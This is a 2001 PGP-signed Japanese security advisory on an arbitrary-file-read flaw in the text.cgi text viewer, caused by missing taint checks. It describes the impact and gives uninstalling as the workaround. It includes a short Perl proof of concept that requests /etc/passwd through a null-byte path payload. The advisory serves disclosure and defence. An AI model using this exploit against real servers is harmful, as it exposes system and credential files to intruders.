-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [Text 0.3b, 0.4, 0.4a]       2001/02/27
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/text_2001_02_27.txt
======================================================================

■ 影響を受けるCGIプログラム

* テキスト閲覧 text.cgi 0.3b, 0.4, 0.4a
  (これ以前の全てのバージョンには同様の問題が存在する可能性があります。)

■ 概要

テキスト閲覧 text.cgi 0.3b, 0.4, 0.4a はてっちゃん氏によって作成された
テキスト表示 CGI プログラムです。このプログラムには外部から任意のファ
イルが読み取り可能である、セキュリティ上の問題点があります。

テキスト閲覧 text.cgi: http://homepage2.nifty.com/sophia0/sub04.html

■ 解説

テキスト閲覧 text.cgi v0.3b, 0.4, 0.4a では汚染チェックを怠っているた
め、任意のファイルが表示可能です。

■ 影響

CGIプログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など)
の場合、そのユーザの権限で任意のファイルを表示することが可能です。そう
ではない場合でも、CGI プログラムの実行 UID の権限で任意ファイルを表示
することが可能です。

システムファイル (パスワードファイルなど) などを読み取られた場合、シス
テム侵入の糸口となる可能性があります。

■ 回避方法

テキスト閲覧 をアンインストールする。

■ 参考コード

#! /usr/bin/perl -w

use LWP::UserAgent;

$header = new HTTP::Headers(Referer => "http://host/textcgi/");
$request = new HTTP::Request("GET", "http://host/textcgi/text.cgi?path=/etc/passwd%00wide/album/AyuMoe.txt", $header);
$ua = new LWP::UserAgent;
$response = $ua->request($request);
print $response->content;

__END__

■ 履歴

2001/02/27: 公開
2001/03/13: 一部修正・参考コードを追記
2001/03/17: 一部修正

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です。
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7rqeMduP2KhBu8ikRAtTlAKCImyJx5biORpsesAl3XjYBAB/FvgCgvnyH
lHhtakUJZ8buMIWZlRxsVc6IPwMFATuup4zCitaZXxzdBBEC1OUAoIermvKT+idi
3TSHGdK0eRXQf6QjAKCWCHfSokbI7P5fY7tjHMc5pRB/pg==
=Z5jZ
-----END PGP SIGNATURE-----